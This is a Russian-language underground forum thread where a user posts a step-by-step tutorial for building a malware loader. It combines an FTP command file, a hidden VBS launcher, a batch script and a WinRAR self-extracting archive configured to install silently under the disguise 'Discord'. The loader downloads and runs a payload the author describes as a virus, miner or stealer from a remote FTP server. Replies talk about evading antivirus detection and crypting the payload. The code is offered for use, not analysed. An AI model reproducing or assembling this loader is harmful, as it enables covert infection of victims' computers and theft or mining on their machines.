• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

    После регистрации будут доступны основные разделы.

    Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Создаем LOADER 0 детектор/FUD 0

Senkool

Новичок
Сообщения
2
Реакции
3
0 руб.
Всем привет. Читал я тут статейки и решил выложить свою. Выложить то, что завалялось на компе. Не знаю есть ли такая тема на форуме. Если тема не в том разделе, то прошу модераторов перенести. Вообщем, сегодня будем создавать loader стандартными средствами Windows.
Итак,

1) Сначала нам нужно найти хостинг с FTP доступом. Можете взять бесплатный, можете арендовать. И загружаем на него ваш вирус/майнер/стиллер и т.д.

2) Создаем текстовый документ и называем его "ftp.txt", без кавычек. Открываем его и вставляем туда следующее:
open ип сервера (например: 192.168.1.1)
логин для входа через ftp (Например: Senkool)
пароль (например: 12345)
lcd C:\Program Files\Microsoft Office (Здесь, куда будет скачивать файл)
binary
get ATL.mp3 (Это имя файла, я решил для примера взять мп3, но также будет работать и с exe и любым другим форматом, я проверял)
quit

3) Далее создаем файл и называем его "vbs.vbs", без кавычек и вставляем туда следующее:
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "123.cmd" & Chr(34), 0
Set WshShell = Nothing
Сохраняем

4) После создаем файл с названием "123.cmd", без кавычек и вставляем следующее:

Echo OFF

ftp -s:ftp.txt

Start ATL.mp3
Сохраняем всё в одной папке.

5) Далее Выделяем эти три файла -> ПКМ -> Добавить в архив...
Далее вылезет окно WinRar, там выбираем "Метод сжатия - максимальный", изменяем имя и ставим галочки на "Создать SFX архив" и "Создать непрерывный архив" и переходим во вкладку "Комментарии" и там вставляем следующее:

Path=C:\Program Files\Microsoft Office
Setup=vbs.vbs
Silent=1
Overwrite=1
Update=U
Title=Discord (Здесь можете поставить другое имя, я маскировал под дискорд)
Text
{
Updating...
}

И всё, жмем "ОК"
Теперь в папке с файлами появиться EXE файл, запустив его, у нас начнется скачивание файла в скрытом режиме.Посмотреть вложение 176
vt.png
Ссылка на скан - ТЫК
 

grilder

Участник
Сообщения
14
Реакции
3
0 руб.
Telegram
Я пробовал подобную тему! Но после того когда идёт запуск скаченного rat - он блочится (если есть Detect)
 

Bomjik

Местный
Сообщения
58
Реакции
53
0 руб.
Please note, if you want to make a deal with this user, that it is blocked.
Это как в запороленный архив вирус сунуть
 

kravl

Участник
Сообщения
19
Реакции
24
0 руб.
Please note, if you want to make a deal with this user, that it is blocked.
ТС, это FUD только на твой архив, а не на то что в нем :) @Bomjik правильно сказал.
 

justiceisfake

Новичок
Сообщения
2
Реакции
0
0 руб.
Telegram
Я считаю автор прав, он и говорит, что лоадер не палится. Так и есть. А то что будет скачано - это уже отдельная история. Подгрузившееся надо отдельно криптовать. И спасибо за статью! Просто и понятно.
 
Сверху Снизу